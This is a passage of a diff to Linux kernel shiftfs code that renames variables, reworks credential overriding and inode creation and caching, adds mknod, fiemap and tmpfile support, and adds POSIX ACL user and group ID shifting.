--		printk(KERN_ERR "shiftfs: Credential override failed: no memory\n");
-+static void shiftfs_copyflags(struct inode *from, struct inode *to)
-+{
-+	unsigned int mask = S_SYNC | S_IMMUTABLE | S_APPEND | S_NOATIME;
- 
--	return cred;
-+	inode_set_flags(to, from->i_flags & mask, mask);
- }
- 
--static void shiftfs_old_creds(const struct cred *oldcred,
--			      const struct cred **newcred)
-+static void shiftfs_file_accessed(struct file *file)
- {
--	if (!*newcred)
-+	struct inode *upperi, *loweri;
-+
-+	if (file->f_flags & O_NOATIME)
- 		return;
- 
--	revert_creds(oldcred);
--	put_cred(*newcred);
-+	upperi = file_inode(file);
-+	loweri = upperi->i_private;
-+
-+	if (!loweri)
-+		return;
-+
-+	upperi->i_mtime = loweri->i_mtime;
-+	upperi->i_ctime = loweri->i_ctime;
-+
-+	touch_atime(&file->f_path);
- }
- 
--static int shiftfs_parse_options(struct shiftfs_super_info *ssi, char *options)
-+static int shiftfs_parse_mount_options(struct shiftfs_super_info *sbinfo,
-+				       char *options)
- {
- 	char *p;
- 	substring_t args[MAX_OPT_ARGS];
- 
--	ssi->mark = false;
-+	sbinfo->mark = false;
-+	sbinfo->passthrough = 0;
- 
- 	while ((p = strsep(&options, ",")) != NULL) {
--		int token;
-+		int err, intarg, token;
- 
- 		if (!*p)
- 			continue;
-@@ -91,121 +188,140 @@ static int shiftfs_parse_options(struct shiftfs_super_info *ssi, char *options)
- 		token = match_token(p, tokens, args);
- 		switch (token) {
- 		case OPT_MARK:
--			ssi->mark = true;
-+			sbinfo->mark = true;
-+			break;
-+		case OPT_PASSTHROUGH:
-+			err = match_int(&args[0], &intarg);
-+			if (err)
-+				return err;
-+
-+			if (intarg & ~SHIFTFS_PASSTHROUGH_ALL)
-+				return -EINVAL;
-+
-+			sbinfo->passthrough = intarg;
- 			break;
- 		default:
- 			return -EINVAL;
- 		}
- 	}
-+
- 	return 0;
- }
- 
- static void shiftfs_d_release(struct dentry *dentry)
- {
--	struct dentry *real = dentry->d_fsdata;
-+	struct dentry *lowerd = dentry->d_fsdata;
- 
--	dput(real);
-+	if (lowerd)
-+		dput(lowerd);
- }
- 
- static struct dentry *shiftfs_d_real(struct dentry *dentry,
- 				     const struct inode *inode)
- {
--	struct dentry *real = dentry->d_fsdata;
-+	struct dentry *lowerd = dentry->d_fsdata;
-+
-+	if (inode && d_inode(dentry) == inode)
-+		return dentry;
- 
--	if (unlikely(real->d_flags & DCACHE_OP_REAL))
--		return real->d_op->d_real(real, real->d_inode);
-+	lowerd = d_real(lowerd, inode);
-+	if (lowerd && (!inode || inode == d_inode(lowerd)))
-+		return lowerd;
- 
--	return real;
-+	WARN(1, "shiftfs_d_real(%pd4, %s:%lu): real dentry not found\n", dentry,
-+	     inode ? inode->i_sb->s_id : "NULL", inode ? inode->i_ino : 0);
-+	return dentry;
- }
- 
- static int shiftfs_d_weak_revalidate(struct dentry *dentry, unsigned int flags)
- {
--	struct dentry *real = dentry->d_fsdata;
-+	int err = 1;
-+	struct dentry *lowerd = dentry->d_fsdata;
- 
--	if (d_unhashed(real))
-+	if (d_is_negative(lowerd) != d_is_negative(dentry))
- 		return 0;
- 
--	if (!(real->d_flags & DCACHE_OP_WEAK_REVALIDATE))
--		return 1;
-+	if ((lowerd->d_flags & DCACHE_OP_WEAK_REVALIDATE))
-+		err = lowerd->d_op->d_weak_revalidate(lowerd, flags);
- 
--	return real->d_op->d_weak_revalidate(real, flags);
-+	if (d_really_is_positive(dentry)) {
-+		struct inode *inode = d_inode(dentry);
-+		struct inode *loweri = d_inode(lowerd);
-+
-+		shiftfs_copyattr(loweri, inode);
-+		if (!inode->i_nlink)
-+			err = 0;
-+	}
-+
-+	return err;
- }
- 
- static int shiftfs_d_revalidate(struct dentry *dentry, unsigned int flags)
- {
--	struct dentry *real = dentry->d_fsdata;
--	int ret;
-+	int err = 1;
-+	struct dentry *lowerd = dentry->d_fsdata;
- 
--	if (d_unhashed(real))
-+	if (d_unhashed(lowerd) ||
-+	    ((d_is_negative(lowerd) != d_is_negative(dentry))))
- 		return 0;
- 
--	/*
--	 * inode state of underlying changed from positive to negative
--	 * or vice versa; force a lookup to update our view
--	 */
--	if (d_is_negative(real) != d_is_negative(dentry))
--		return 0;
-+	if (flags & LOOKUP_RCU)
-+		return -ECHILD;
- 
--	if (!(real->d_flags & DCACHE_OP_REVALIDATE))
--		return 1;
-+	if ((lowerd->d_flags & DCACHE_OP_REVALIDATE))
-+		err = lowerd->d_op->d_revalidate(lowerd, flags);
- 
--	ret = real->d_op->d_revalidate(real, flags);
-+	if (d_really_is_positive(dentry)) {
-+		struct inode *inode = d_inode(dentry);
-+		struct inode *loweri = d_inode(lowerd);
- 
--	if (ret == 0 && !(flags & LOOKUP_RCU))
--		d_invalidate(real);
-+		shiftfs_copyattr(loweri, inode);
-+		if (!inode->i_nlink)
-+			err = 0;
-+	}
- 
--	return ret;
-+	return err;
- }
- 
- static const struct dentry_operations shiftfs_dentry_ops = {
--	.d_release	= shiftfs_d_release,
--	.d_real		= shiftfs_d_real,
--	.d_revalidate	= shiftfs_d_revalidate,
-+	.d_release	   = shiftfs_d_release,
-+	.d_real		   = shiftfs_d_real,
-+	.d_revalidate	   = shiftfs_d_revalidate,
- 	.d_weak_revalidate = shiftfs_d_weak_revalidate,
- };
- 
--static int shiftfs_readlink(struct dentry *dentry, char __user *data,
--			    int flags)
--{
--	struct dentry *real = dentry->d_fsdata;
--	const struct inode_operations *iop = real->d_inode->i_op;
--
--	if (iop->readlink)
--		return iop->readlink(real, data, flags);
--
--	return -EINVAL;
--}
--
- static const char *shiftfs_get_link(struct dentry *dentry, struct inode *inode,
- 				    struct delayed_call *done)
- {
--	if (dentry) {
--		struct dentry *real = dentry->d_fsdata;
--		struct inode *reali = real->d_inode;
--		const struct inode_operations *iop = reali->i_op;
--		const char *res = ERR_PTR(-EPERM);
--
--		if (iop->get_link)
--			res = iop->get_link(real, reali, done);
-+	const char *p;
-+	const struct cred *oldcred;
-+	struct dentry *lowerd;
- 
--		return res;
--	} else {
--		/* RCU lookup not supported */
-+	/* RCU lookup not supported */
-+	if (!dentry)
- 		return ERR_PTR(-ECHILD);
--	}
-+
-+	lowerd = dentry->d_fsdata;
-+	oldcred = shiftfs_override_creds(dentry->d_sb);
-+	p = vfs_get_link(lowerd, done);
-+	revert_creds(oldcred);
-+
-+	return p;
- }
- 
- static int shiftfs_setxattr(struct dentry *dentry, struct inode *inode,
- 			    const char *name, const void *value,
- 			    size_t size, int flags)
- {
--	struct dentry *real = dentry->d_fsdata;
--	int err = -EOPNOTSUPP;
--	const struct cred *oldcred, *newcred;
-+	struct dentry *lowerd = dentry->d_fsdata;
-+	int err;
-+	const struct cred *oldcred;
-+
-+	oldcred = shiftfs_override_creds(dentry->d_sb);
-+	err = vfs_setxattr(lowerd, name, value, size, flags);
-+	revert_creds(oldcred);
- 
--	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
--	err = vfs_setxattr(real, name, value, size, flags);
--	shiftfs_old_creds(oldcred, &newcred);
-+	shiftfs_copyattr(lowerd->d_inode, inode);
- 
- 	return err;
- }
-@@ -214,13 +330,13 @@ static int shiftfs_xattr_get(const struct xattr_handler *handler,
- 			     struct dentry *dentry, struct inode *inode,
- 			     const char *name, void *value, size_t size)
- {
--	struct dentry *real = dentry->d_fsdata;
-+	struct dentry *lowerd = dentry->d_fsdata;
- 	int err;
--	const struct cred *oldcred, *newcred;
-+	const struct cred *oldcred;
- 
--	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
--	err = vfs_getxattr(real, name, value, size);
--	shiftfs_old_creds(oldcred, &newcred);
-+	oldcred = shiftfs_override_creds(dentry->d_sb);
-+	err = vfs_getxattr(lowerd, name, value, size);
-+	revert_creds(oldcred);
- 
- 	return err;
- }
-@@ -228,26 +344,29 @@ static int shiftfs_xattr_get(const struct xattr_handler *handler,
- static ssize_t shiftfs_listxattr(struct dentry *dentry, char *list,
- 				 size_t size)
- {
--	struct dentry *real = dentry->d_fsdata;
-+	struct dentry *lowerd = dentry->d_fsdata;
- 	int err;
--	const struct cred *oldcred, *newcred;
-+	const struct cred *oldcred;
- 
--	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
--	err = vfs_listxattr(real, list, size);
--	shiftfs_old_creds(oldcred, &newcred);
-+	oldcred = shiftfs_override_creds(dentry->d_sb);
-+	err = vfs_listxattr(lowerd, list, size);
-+	revert_creds(oldcred);
- 
- 	return err;
- }
- 
- static int shiftfs_removexattr(struct dentry *dentry, const char *name)
- {
--	struct dentry *real = dentry->d_fsdata;
-+	struct dentry *lowerd = dentry->d_fsdata;
- 	int err;
--	const struct cred *oldcred, *newcred;
-+	const struct cred *oldcred;
-+
-+	oldcred = shiftfs_override_creds(dentry->d_sb);
-+	err = vfs_removexattr(lowerd, name);
-+	revert_creds(oldcred);
- 
--	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
--	err = vfs_removexattr(real, name);
--	shiftfs_old_creds(oldcred, &newcred);
-+	/* update c/mtime */
-+	shiftfs_copyattr(lowerd->d_inode, d_inode(dentry));
- 
- 	return err;
- }
-@@ -262,93 +381,157 @@ static int shiftfs_xattr_set(const struct xattr_handler *handler,
- 	return shiftfs_setxattr(dentry, inode, name, value, size, flags);
- }
- 
--static void shiftfs_fill_inode(struct inode *inode, struct dentry *dentry)
-+static int shiftfs_inode_test(struct inode *inode, void *data)
- {
--	struct inode *reali;
--
--	if (!dentry)
--		return;
--
--	reali = dentry->d_inode;
--
--	if (!reali->i_op->get_link)
--		inode->i_opflags |= IOP_NOFOLLOW;
-+	return inode->i_private == data;
-+}
- 
--	inode->i_mapping = reali->i_mapping;
--	inode->i_private = dentry;
-+static int shiftfs_inode_set(struct inode *inode, void *data)
-+{
-+	inode->i_private = data;
-+	return 0;
- }
- 
--static int shiftfs_make_object(struct inode *dir, struct dentry *dentry,
--			       umode_t mode, const char *symlink,
--			       struct dentry *hardlink, bool excl)
-+static int shiftfs_create_object(struct inode *diri, struct dentry *dentry,
-+				 umode_t mode, const char *symlink,
-+				 struct dentry *hardlink, bool excl)
- {
--	struct dentry *real = dir->i_private, *new = dentry->d_fsdata;
--	struct inode *reali = real->d_inode, *newi;
--	const struct inode_operations *iop = reali->i_op;
- 	int err;
--	const struct cred *oldcred, *newcred;
--	bool op_ok = false;
-+	const struct cred *oldcred;
-+	struct cred *newcred;
-+	void *loweri_iop_ptr = NULL;
-+	umode_t modei = mode;
-+	struct super_block *dir_sb = diri->i_sb;
-+	struct dentry *lowerd_new = dentry->d_fsdata;
-+	struct inode *inode = NULL, *loweri_dir = diri->i_private;
-+	const struct inode_operations *loweri_dir_iop = loweri_dir->i_op;
-+	struct dentry *lowerd_link = NULL;
- 
- 	if (hardlink) {
--		op_ok = iop->link;
-+		loweri_iop_ptr = loweri_dir_iop->link;
- 	} else {
- 		switch (mode & S_IFMT) {
- 		case S_IFDIR:
--			op_ok = iop->mkdir;
-+			loweri_iop_ptr = loweri_dir_iop->mkdir;
- 			break;
- 		case S_IFREG:
--			op_ok = iop->create;
-+			loweri_iop_ptr = loweri_dir_iop->create;
- 			break;
- 		case S_IFLNK:
--			op_ok = iop->symlink;
-+			loweri_iop_ptr = loweri_dir_iop->symlink;
-+			break;
-+		case S_IFSOCK:
-+			/* fall through */
-+		case S_IFIFO:
-+			loweri_iop_ptr = loweri_dir_iop->mknod;
-+			break;
- 		}
- 	}
--	if (!op_ok)
--		return -EINVAL;
-+	if (!loweri_iop_ptr) {
-+		err = -EINVAL;
-+		goto out_iput;
-+	}
- 
-+	inode_lock_nested(loweri_dir, I_MUTEX_PARENT);
- 
--	newi = shiftfs_new_inode(dentry->d_sb, mode, NULL);
--	if (!newi)
--		return -ENOMEM;
-+	if (!hardlink) {
-+		inode = new_inode(dir_sb);
-+		if (!inode) {
-+			err = -ENOMEM;
-+			goto out_iput;
-+		}
-+
-+		/*
-+		 * new_inode() will have added the new inode to the super
-+		 * block's list of inodes. Further below we will call
-+		 * inode_insert5() Which would perform the same operation again
-+		 * thereby corrupting the list. To avoid this raise I_CREATING
-+		 * in i_state which will cause inode_insert5() to skip this
-+		 * step. I_CREATING will be cleared by d_instantiate_new()
-+		 * below.
-+		 */
-+		spin_lock(&inode->i_lock);
-+		inode->i_state |= I_CREATING;
-+		spin_unlock(&inode->i_lock);
- 
--	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
-+		inode_init_owner(inode, diri, mode);
-+		modei = inode->i_mode;
-+	}
- 
--	inode_lock_nested(reali, I_MUTEX_PARENT);
-+	err = shiftfs_override_object_creds(dentry->d_sb, &oldcred, &newcred,
-+					    dentry, modei, hardlink != NULL);
-+	if (err)
-+		goto out_iput;
- 
--	err = -EINVAL;		/* shut gcc up about uninit var */
- 	if (hardlink) {
--		struct dentry *realhardlink = hardlink->d_fsdata;
--
--		err = vfs_link(realhardlink, reali, new, NULL);
-+		lowerd_link = hardlink->d_fsdata;
-+		err = vfs_link(lowerd_link, loweri_dir, lowerd_new, NULL);
- 	} else {
--		switch (mode & S_IFMT) {
-+		switch (modei & S_IFMT) {
- 		case S_IFDIR:
--			err = vfs_mkdir(reali, new, mode);
-+			err = vfs_mkdir(loweri_dir, lowerd_new, modei);
- 			break;
- 		case S_IFREG:
--			err = vfs_create(reali, new, mode, excl);
-+			err = vfs_create(loweri_dir, lowerd_new, modei, excl);
- 			break;
- 		case S_IFLNK:
--			err = vfs_symlink(reali, new, symlink);
-+			err = vfs_symlink(loweri_dir, lowerd_new, symlink);
-+			break;
-+		case S_IFSOCK:
-+			/* fall through */
-+		case S_IFIFO:
-+			err = vfs_mknod(loweri_dir, lowerd_new, modei, 0);
-+			break;
-+		default:
-+			err = -EINVAL;
-+			break;
- 		}
- 	}
- 
--	shiftfs_old_creds(oldcred, &newcred);
-+	shiftfs_revert_object_creds(oldcred, newcred);
- 
-+	if (!err && WARN_ON(!lowerd_new->d_inode))
-+		err = -EIO;
- 	if (err)
--		goto out_dput;
-+		goto out_iput;
-+
-+	if (hardlink) {
-+		inode = d_inode(hardlink);
-+		ihold(inode);
-+
-+		/* copy up times from lower inode */
-+		shiftfs_copyattr(d_inode(lowerd_link), inode);
-+		set_nlink(d_inode(hardlink), d_inode(lowerd_link)->i_nlink);
-+		d_instantiate(dentry, inode);
-+	} else {
-+		struct inode *inode_tmp;
-+		struct inode *loweri_new = d_inode(lowerd_new);
-+
-+		inode_tmp = inode_insert5(inode, (unsigned long)loweri_new,
-+					  shiftfs_inode_test, shiftfs_inode_set,
-+					  loweri_new);
-+		if (unlikely(inode_tmp != inode)) {
-+			pr_err_ratelimited("shiftfs: newly created inode found in cache\n");
-+			iput(inode_tmp);
-+			err = -EINVAL;
-+			goto out_iput;
-+		}
- 
--	shiftfs_fill_inode(newi, new);
-+		ihold(loweri_new);
-+		shiftfs_fill_inode(inode, loweri_new->i_ino, loweri_new->i_mode,
-+				   0, lowerd_new);
-+		d_instantiate_new(dentry, inode);
-+	}
- 
--	d_instantiate(dentry, newi);
-+	shiftfs_copyattr(loweri_dir, diri);
-+	if (loweri_iop_ptr == loweri_dir_iop->mkdir)
-+		set_nlink(diri, loweri_dir->i_nlink);
- 
--	new = NULL;
--	newi = NULL;
-+	inode = NULL;
- 
-- out_dput:
--	dput(new);
--	iput(newi);
--	inode_unlock(reali);
-+out_iput:
-+	iput(inode);
-+	inode_unlock(loweri_dir);
- 
- 	return err;
- }
-@@ -358,7 +541,7 @@ static int shiftfs_create(struct inode *dir, struct dentry *dentry,
- {
- 	mode |= S_IFREG;
- 
--	return shiftfs_make_object(dir, dentry, mode, NULL, NULL, excl);
-+	return shiftfs_create_object(dir, dentry, mode, NULL, NULL, excl);
- }
- 
- static int shiftfs_mkdir(struct inode *dir, struct dentry *dentry,
-@@ -366,39 +549,52 @@ static int shiftfs_mkdir(struct inode *dir, struct dentry *dentry,
- {
- 	mode |= S_IFDIR;
- 
--	return shiftfs_make_object(dir, dentry, mode, NULL, NULL, false);
-+	return shiftfs_create_object(dir, dentry, mode, NULL, NULL, false);
- }
- 
- static int shiftfs_link(struct dentry *hardlink, struct inode *dir,
- 			struct dentry *dentry)
- {
--	return shiftfs_make_object(dir, dentry, 0, NULL, hardlink, false);
-+	return shiftfs_create_object(dir, dentry, 0, NULL, hardlink, false);
-+}
-+
-+static int shiftfs_mknod(struct inode *dir, struct dentry *dentry, umode_t mode,
-+			 dev_t rdev)
-+{
-+	if (!S_ISFIFO(mode) && !S_ISSOCK(mode))
-+		return -EPERM;
-+
-+	return shiftfs_create_object(dir, dentry, mode, NULL, NULL, false);
- }
- 
- static int shiftfs_symlink(struct inode *dir, struct dentry *dentry,
- 			   const char *symlink)
- {
--	return shiftfs_make_object(dir, dentry, S_IFLNK, symlink, NULL, false);
-+	return shiftfs_create_object(dir, dentry, S_IFLNK, symlink, NULL, false);
- }
- 
- static int shiftfs_rm(struct inode *dir, struct dentry *dentry, bool rmdir)
- {
--	struct dentry *real = dir->i_private, *new = dentry->d_fsdata;
--	struct inode *reali = real->d_inode;
-+	struct dentry *lowerd = dentry->d_fsdata;
-+	struct inode *loweri = dir->i_private;
- 	int err;
--	const struct cred *oldcred, *newcred;
--
--	inode_lock_nested(reali, I_MUTEX_PARENT);
--
--	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
-+	const struct cred *oldcred;
- 
-+	oldcred = shiftfs_override_creds(dentry->d_sb);
-+	inode_lock_nested(loweri, I_MUTEX_PARENT);
- 	if (rmdir)
--		err = vfs_rmdir(reali, new);
-+		err = vfs_rmdir(loweri, lowerd);
- 	else
--		err = vfs_unlink(reali, new, NULL);
-+		err = vfs_unlink(loweri, lowerd, NULL);
-+	inode_unlock(loweri);
-+	revert_creds(oldcred);
- 
--	shiftfs_old_creds(oldcred, &newcred);
--	inode_unlock(reali);
-+	shiftfs_copyattr(loweri, dir);
-+	set_nlink(d_inode(dentry), loweri->i_nlink);
-+	if (!err)
-+		d_drop(dentry);
-+
-+	set_nlink(dir, loweri->i_nlink);
- 
- 	return err;
- }
-@@ -417,27 +613,30 @@ static int shiftfs_rename(struct inode *olddir, struct dentry *old,
- 			  struct inode *newdir, struct dentry *new,
- 			  unsigned int flags)
- {
--	struct dentry *rodd = olddir->i_private, *rndd = newdir->i_private,
--		*realold = old->d_fsdata,
--		*realnew = new->d_fsdata, *trap;
--	struct inode *realolddir = rodd->d_inode, *realnewdir = rndd->d_inode;
-+	struct dentry *lowerd_dir_old = old->d_parent->d_fsdata,
-+		      *lowerd_dir_new = new->d_parent->d_fsdata,
-+		      *lowerd_old = old->d_fsdata, *lowerd_new = new->d_fsdata,
-+		      *trapd;
-+	struct inode *loweri_dir_old = lowerd_dir_old->d_inode,
-+		     *loweri_dir_new = lowerd_dir_new->d_inode;
- 	int err = -EINVAL;
--	const struct cred *oldcred, *newcred;
-+	const struct cred *oldcred;
- 
--	trap = lock_rename(rndd, rodd);
-+	trapd = lock_rename(lowerd_dir_new, lowerd_dir_old);
- 
--	if (trap == realold || trap == realnew)
-+	if (trapd == lowerd_old || trapd == lowerd_new)
- 		goto out_unlock;
- 
--	oldcred = shiftfs_new_creds(&newcred, old->d_sb);
--
--	err = vfs_rename(realolddir, realold, realnewdir,
--			 realnew, NULL, flags);
-+	oldcred = shiftfs_override_creds(old->d_sb);
-+	err = vfs_rename(loweri_dir_old, lowerd_old, loweri_dir_new, lowerd_new,
-+			 NULL, flags);
-+	revert_creds(oldcred);
- 
--	shiftfs_old_creds(oldcred, &newcred);
-+	shiftfs_copyattr(loweri_dir_old, olddir);
-+	shiftfs_copyattr(loweri_dir_new, newdir);
- 
-- out_unlock:
--	unlock_rename(rndd, rodd);
-+out_unlock:
-+	unlock_rename(lowerd_dir_new, lowerd_dir_old);
- 
- 	return err;
- }
-@@ -445,304 +644,1210 @@ static int shiftfs_rename(struct inode *olddir, struct dentry *old,
- static struct dentry *shiftfs_lookup(struct inode *dir, struct dentry *dentry,
- 				     unsigned int flags)
- {
--	struct dentry *real = dir->i_private, *new;
--	struct inode *reali = real->d_inode, *newi;
--	const struct cred *oldcred, *newcred;
--
--	inode_lock(reali);
--	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
--	new = lookup_one_len(dentry->d_name.name, real, dentry->d_name.len);
--	shiftfs_old_creds(oldcred, &newcred);
--	inode_unlock(reali);
-+	struct dentry *new;
-+	struct inode *newi;
-+	const struct cred *oldcred;
-+	struct dentry *lowerd = dentry->d_parent->d_fsdata;
-+	struct inode *inode = NULL, *loweri = lowerd->d_inode;
-+
-+	inode_lock(loweri);
-+	oldcred = shiftfs_override_creds(dentry->d_sb);
-+	new = lookup_one_len(dentry->d_name.name, lowerd, dentry->d_name.len);
-+	revert_creds(oldcred);
-+	inode_unlock(loweri);
- 
- 	if (IS_ERR(new))
- 		return new;
- 
- 	dentry->d_fsdata = new;
- 
--	newi = NULL;
--	if (!new->d_inode)
-+	newi = new->d_inode;
-+	if (!newi)
- 		goto out;
- 
--	newi = shiftfs_new_inode(dentry->d_sb, new->d_inode->i_mode, new);
--	if (!newi) {
-+	inode = iget5_locked(dentry->d_sb, (unsigned long)newi,
-+			     shiftfs_inode_test, shiftfs_inode_set, newi);
-+	if (!inode) {
- 		dput(new);
- 		return ERR_PTR(-ENOMEM);
- 	}
-+	if (inode->i_state & I_NEW) {
-+		/*
-+		 * inode->i_private set by shiftfs_inode_set(), but we still
-+		 * need to take a reference
-+		*/
-+		ihold(newi);
-+		shiftfs_fill_inode(inode, newi->i_ino, newi->i_mode, 0, new);
-+		unlock_new_inode(inode);
-+	}
- 
-- out:
--	return d_splice_alias(newi, dentry);
-+out:
-+	return d_splice_alias(inode, dentry);
- }
- 
- static int shiftfs_permission(struct inode *inode, int mask)
- {
--	struct dentry *real = inode->i_private;
--	struct inode *reali = real->d_inode;
--	const struct inode_operations *iop = reali->i_op;
- 	int err;
--	const struct cred *oldcred, *newcred;
-+	const struct cred *oldcred;
-+	struct inode *loweri = inode->i_private;
- 
--	if (mask & MAY_NOT_BLOCK)
-+	if (!loweri) {
-+		WARN_ON(!(mask & MAY_NOT_BLOCK));
- 		return -ECHILD;
-+	}
- 
--	oldcred = shiftfs_new_creds(&newcred, inode->i_sb);
--	if (iop->permission)
--		err = iop->permission(reali, mask);
--	else
--		err = generic_permission(reali, mask);
--	shiftfs_old_creds(oldcred, &newcred);
-+	err = generic_permission(inode, mask);
-+	if (err)
-+		return err;
-+
-+	oldcred = shiftfs_override_creds(inode->i_sb);
-+	err = inode_permission(loweri, mask);
-+	revert_creds(oldcred);
-+
-+	return err;
-+}
-+
-+static int shiftfs_fiemap(struct inode *inode,
-+			  struct fiemap_extent_info *fieinfo, u64 start,
-+			  u64 len)
-+{
-+	int err;
-+	const struct cred *oldcred;
-+	struct inode *loweri = inode->i_private;
-+
-+	if (!loweri->i_op->fiemap)
-+		return -EOPNOTSUPP;
-+
-+	oldcred = shiftfs_override_creds(inode->i_sb);
-+	if (fieinfo->fi_flags & FIEMAP_FLAG_SYNC)
-+		filemap_write_and_wait(loweri->i_mapping);
-+	err = loweri->i_op->fiemap(loweri, fieinfo, start, len);
-+	revert_creds(oldcred);
-+
-+	return err;
-+}
-+
-+static int shiftfs_tmpfile(struct inode *dir, struct dentry *dentry,
-+			   umode_t mode)
-+{
-+	int err;
-+	const struct cred *oldcred;
-+	struct dentry *lowerd = dentry->d_fsdata;
-+	struct inode *loweri = dir->i_private;
-+
-+	if (!loweri->i_op->tmpfile)
-+		return -EOPNOTSUPP;
-+
-+	oldcred = shiftfs_override_creds(dir->i_sb);
-+	err = loweri->i_op->tmpfile(loweri, lowerd, mode);
-+	revert_creds(oldcred);
- 
- 	return err;
- }
- 
- static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr)
- {
--	struct dentry *real = dentry->d_fsdata;
--	struct inode *reali = real->d_inode;
--	const struct inode_operations *iop = reali->i_op;
-+	struct dentry *lowerd = dentry->d_fsdata;
-+	struct inode *loweri = lowerd->d_inode;
- 	struct iattr newattr = *attr;
--	const struct cred *oldcred, *newcred;
-+	const struct cred *oldcred;
- 	struct super_block *sb = dentry->d_sb;
- 	int err;
- 
-+	err = setattr_prepare(dentry, attr);
-+	if (err)
-+		return err;
-+
- 	newattr.ia_uid = KUIDT_INIT(from_kuid(sb->s_user_ns, attr->ia_uid));
- 	newattr.ia_gid = KGIDT_INIT(from_kgid(sb->s_user_ns, attr->ia_gid));
- 
--	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
--	inode_lock(reali);
--	if (iop->setattr)
--		err = iop->setattr(real, &newattr);
--	else
--		err = simple_setattr(real, &newattr);
--	inode_unlock(reali);
--	shiftfs_old_creds(oldcred, &newcred);
-+	inode_lock(loweri);
-+	oldcred = shiftfs_override_creds(dentry->d_sb);
-+	err = notify_change(lowerd, attr, NULL);
-+	revert_creds(oldcred);
-+	inode_unlock(loweri);
- 
--	if (err)
--		return err;
-+	shiftfs_copyattr(loweri, d_inode(dentry));
- 
--	/* all OK, reflect the change on our inode */
--	setattr_copy(d_inode(dentry), attr);
--	return 0;
-+	return err;
- }
- 
- static int shiftfs_getattr(const struct path *path, struct kstat *stat,
- 			   u32 request_mask, unsigned int query_flags)
- {
- 	struct inode *inode = path->dentry->d_inode;
--	struct dentry *real = path->dentry->d_fsdata;
--	struct inode *reali = real->d_inode;
--	const struct inode_operations *iop = reali->i_op;
--	struct path newpath = { .mnt = path->dentry->d_sb->s_fs_info, .dentry = real };
--	int err = 0;
--
--	if (iop->getattr)
--		err = iop->getattr(&newpath, stat, request_mask, query_flags);
--	else
--		generic_fillattr(reali, stat);
-+	struct dentry *lowerd = path->dentry->d_fsdata;
-+	struct inode *loweri = lowerd->d_inode;
-+	struct shiftfs_super_info *info = path->dentry->d_sb->s_fs_info;
-+	struct path newpath = { .mnt = info->mnt, .dentry = lowerd };
-+	struct user_namespace *from_ns = loweri->i_sb->s_user_ns;
-+	struct user_namespace *to_ns = inode->i_sb->s_user_ns;
-+	const struct cred *oldcred;
-+	int err;
-+
-+	oldcred = shiftfs_override_creds(inode->i_sb);
-+	err = vfs_getattr(&newpath, stat, request_mask, query_flags);
-+	revert_creds(oldcred);
- 
- 	if (err)
- 		return err;
- 
- 	/* transform the underlying id */
--	stat->uid = make_kuid(inode->i_sb->s_user_ns, __kuid_val(stat->uid));
--	stat->gid = make_kgid(inode->i_sb->s_user_ns, __kgid_val(stat->gid));
-+	stat->uid = shift_kuid(from_ns, to_ns, stat->uid);
-+	stat->gid = shift_kgid(from_ns, to_ns, stat->gid);
- 	return 0;
- }
- 
--static const struct inode_operations shiftfs_inode_ops = {
--	.lookup		= shiftfs_lookup,
--	.getattr	= shiftfs_getattr,
--	.setattr	= shiftfs_setattr,
--	.permission	= shiftfs_permission,
--	.mkdir		= shiftfs_mkdir,
--	.symlink	= shiftfs_symlink,
--	.get_link	= shiftfs_get_link,
--	.readlink	= shiftfs_readlink,
--	.unlink		= shiftfs_unlink,
--	.rmdir		= shiftfs_rmdir,
--	.rename		= shiftfs_rename,
--	.link		= shiftfs_link,
--	.create		= shiftfs_create,
--	.mknod		= NULL,	/* no special files currently */
--	.listxattr	= shiftfs_listxattr,
--};
-+#ifdef CONFIG_SHIFT_FS_POSIX_ACL
- 
--static struct inode *shiftfs_new_inode(struct super_block *sb, umode_t mode,
--				       struct dentry *dentry)
-+static int
-+shift_acl_ids(struct user_namespace *from, struct user_namespace *to,
-+	      struct posix_acl *acl)
- {
--	struct inode *inode;
--
--	inode = new_inode(sb);
--	if (!inode)
--		return NULL;
--
--	/*
--	 * our inode is completely vestigial.  All lookups, getattr
--	 * and permission checks are done on the underlying inode, so
--	 * what the user sees is entirely from the underlying inode.
--	 */
--	mode &= S_IFMT;
-+	int i;
-+
-+	for (i = 0; i < acl->a_count; i++) {
-+		struct posix_acl_entry *e = &acl->a_entries[i];
-+		switch(e->e_tag) {
-+		case ACL_USER:
-+			e->e_uid = shift_kuid(from, to, e->e_uid);
-+			if (!uid_valid(e->e_uid))
-+				return -EOVERFLOW;
-+			break;
-+		case ACL_GROUP:
-+			e->e_gid = shift_kgid(from, to, e->e_gid);
-+			if (!gid_valid(e->e_gid))
-+				return -EOVERFLOW;
-+			break;
-+		}
-+	}
-+	return 0;
-+}
- 
--	inode->i_ino = get_next_ino();
--	inode->i_mode = mode;
--	inode->i_flags |= S_NOATIME | S_NOCMTIME;
-+static void
-+shift_acl_xattr_ids(struct user_namespace *from, struct user_namespace *to,
-+		    void *value, size_t size)
-+{
-+	struct posix_acl_xattr_header *header = value;
-+	struct posix_acl_xattr_entry *entry = (void *)(header + 1), *end;
-+	int count;
-+	kuid_t kuid;
-+	kgid_t kgid;
- 
--	inode->i_op = &shiftfs_inode_ops;
-+	if (!value)
-+		return;
-+	if (size < sizeof(struct posix_acl_xattr_header))
-+		return;
-+	if (header->a_version != cpu_to_le32(POSIX_ACL_XATTR_VERSION))
-+		return;
- 
--	shiftfs_fill_inode(inode, dentry);
-+	count = posix_acl_xattr_count(size);
-+	if (count < 0)
-+		return;
-+	if (count == 0)
-+		return;
- 
--	return inode;
-+	for (end = entry + count; entry != end; entry++) {
-+		switch(le16_to_cpu(entry->e_tag)) {
-+		case ACL_USER:
-+			kuid = make_kuid(&init_user_ns, le32_to_cpu(entry->e_id));
-+			kuid = shift_kuid(from, to, kuid);
-+			entry->e_id = cpu_to_le32(from_kuid(&init_user_ns, kuid));
-+			break;
-+		case ACL_GROUP:
-+			kgid = make_kgid(&init_user_ns, le32_to_cpu(entry->e_id));
-+			kgid = shift_kgid(from, to, kgid);
-+			entry->e_id = cpu_to_le32(from_kgid(&init_user_ns, kgid));
-+			break;
-+		default:
